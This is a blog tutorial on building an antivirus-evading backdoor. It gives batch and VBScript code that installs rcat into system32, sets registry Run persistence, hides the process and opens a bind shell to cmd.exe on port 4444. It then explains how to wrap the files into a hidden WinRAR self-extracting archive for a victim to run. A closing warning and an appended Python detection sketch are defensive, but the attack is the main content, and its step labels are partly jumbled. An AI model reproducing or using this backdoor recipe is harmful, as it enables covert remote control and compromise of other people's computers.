Saturday, November 10, 2012

How To Bypass Antivirus With Rcat


As rcat is a good replica of Netcat and is able to bypass most antivirus products, why not wrap it up with another file (that must not be a backdoor)? Here is the report.
To do this we use a simple technique:


1) Create a batch file and a VBS file that will add your Rcat into the system folder and can edit the Windows registry. Wait, you don't need to create it because I did it for you.
@echo off
copy rcat.exe %systemroot%\system32\rcat.exe
if errorlevel 0 goto regedit
goto error
:regedit
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v nc /d "%systemroot%\system32\name.vbs"
if errorlevel 0 goto ip
:error
echo something wrong with the program.
goto end
:ip
echo write down the IP address from the table
ipconfig
:end
echo end.
rcat.exe  -l -p 4444 -e cmd.exe -L
(We add a registry key because it auto-runs rcat at startup.)
a) Open Notepad and then save it as name.bat
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run chr(34) & "C:\WINDOWS\system32\name.bat" & Chr(34), 0
Set WshShell = Nothing
(In order to hide the running rcat we use a VBScript.)
b) Open another Notepad window, then save it as name.vbs
b) Download rcat and then copy rcat.exe into the same directory where name.bat and name.vbs exist
c) Now we use WinRAR to combine these three files: select all three, then right-click and choose Add to archive.
d) In the next window, check Create SFX archive
e) Go to the Advanced tab and click SFX options
f) Fill out the options as in the figure below
g) Change the tab to Modes and select Hide all
h) Almost done: click OK, then OK again to create an exe file
i) The new file must appear in the same directory
2) The new file is able to bypass the most famous antivirus software, and it contains our backdoor.
Let's suppose our victim has executed the file. Now we can easily get the response via our command prompt or terminal.

  

Conclusion

There are crypters, wrappers and other tools available on the Internet. It is highly recommended not to download any file from an unknown source, because some people use these techniques to make an innocent person look like a fool. So when you download and install such a file, there is a chance that your computer will be affected by some sort of malware and backdoor(s).
So last but not least, never trust any unknown source. Otherwise you will be the next victim, whether you have antivirus or not. And now you have seen how easy it is to bypass an antivirus.
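Because the antivirus cannot be relied on here, a defender can look instead for what the steps above leave behind: a Run value that starts a script, a script host launching a script from the Windows directory, and a listener that hands connections to cmd.exe. The following Python sketch is an added example, not part of the original post; the heuristics are assumptions, and the registry output and command lines are constructed sample data built from the names used in this post.

```python
import re

# Constructed sample data (not captured from a real host): `reg query` output
# for the HKLM Run key and a few process-creation command lines.
SAMPLE_RUN_KEY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    nc    REG_SZ    C:\WINDOWS\system32\name.vbs
"""
SAMPLE_CMDLINES = [
    r"C:\Windows\System32\svchost.exe -k netsvcs",
    r"rcat.exe  -l -p 4444 -e cmd.exe -L",
    r'wscript.exe "C:\WINDOWS\system32\name.vbs"',
]

# One value line of `reg query` output: name, type and data split by 4 spaces.
RUN_VALUE = re.compile(r"^\s+(?P<name>.+?)\s{4}(?P<type>REG_\w+)\s{4}(?P<data>.*)$")
SCRIPT_EXT = re.compile(r"\.(vbs|vbe|js|jse|wsf|bat|cmd)\b", re.I)
# A listener (-l) that hands each connection to a command shell (-e cmd.exe).
SHELL_LISTENER = re.compile(
    r"(?=.*\s-l\b)(?=.*\s-e\s+\S*(cmd|powershell)(\.exe)?\b)", re.I)
SCRIPT_HOST = re.compile(r"\b(wscript|cscript)(\.exe)?\b", re.I)
WINDIR = re.compile(r"\\windows\\", re.I)


def suspicious_run_values(reg_output):
    """Return (name, data) for Run values that start a script, not a binary."""
    hits = []
    for line in reg_output.splitlines():
        m = RUN_VALUE.match(line)
        if m and SCRIPT_EXT.search(m["data"]):
            hits.append((m["name"], m["data"]))
    return hits


def suspicious_cmdlines(cmdlines):
    """Return (reason, cmdline) for shell-bound listeners and for script hosts
    running a script that lives under the Windows directory."""
    hits = []
    for c in cmdlines:
        if SHELL_LISTENER.search(c):
            hits.append(("listener-with-shell", c))
        elif SCRIPT_HOST.search(c) and WINDIR.search(c) and SCRIPT_EXT.search(c):
            hits.append(("script-host-in-windir", c))
    return hits


if __name__ == "__main__":
    for hit in suspicious_run_values(SAMPLE_RUN_KEY) + suspicious_cmdlines(SAMPLE_CMDLINES):
        print(hit)
```

On a real host the inputs would come from `reg query` on the Run keys and from process-creation logging; both checks key on behaviour, so they still fire if the files are renamed.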

Hope you will like this. If you still have any problem, just comment :D
